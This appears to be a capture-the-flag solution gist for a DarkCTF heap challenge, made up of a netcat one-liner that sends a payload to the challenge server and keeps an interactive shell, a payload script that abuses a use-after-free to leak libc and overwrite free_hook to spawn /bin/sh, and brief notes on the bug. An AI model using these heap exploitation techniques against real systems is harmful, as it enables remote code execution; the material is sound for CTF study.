hkraw/278acf3cf1e5a8c45fa84c532a6a8acd (last active March 7, 2021 23:27)
```exploit.sh
#!/bin/bash
# Send the payload file, then keep stdin attached for the interactive shell.
(cat payload; cat)|nc pynotes.darkarmy.xyz 32769
```
```payload
# Offsets into the remote libc used by the exploit.
unsortedbinoffset = 0x3ebca0
aaa = 0x4f4e0
freehook = 0x3ed8e8
new(0,0xf0,0x1)
for i in range(6):
    delete(0)

delete(0)
delete(0)
libcleak = view(0)
libc = libcleak-unsortedbinoffset
print(f'Libc: {libc:x}')
new(1,0xc8,0xdeadbeef)
delete(1)
delete(1)
new(2,0xc8,libc+freehook)
new(3,0xc8,0xdeadbeef)
new(4,0xc8,libc+aaa)
# print() frees the string it is given, so the free goes through free_hook (see the notes below).
print("/bin/sh")
DARKCTF
```
""" | |
The challenge was simple heap exploitation challenge. I gave the python extension module. `_notes` The bug? | |
UAF, WHich make double free. | |
Just be carefull with what sizes you choose, and how you write expl. Nothing new. somehow print() does free on the string we give. | |
free_hook -> system and print("/bin/sh") | |
""" |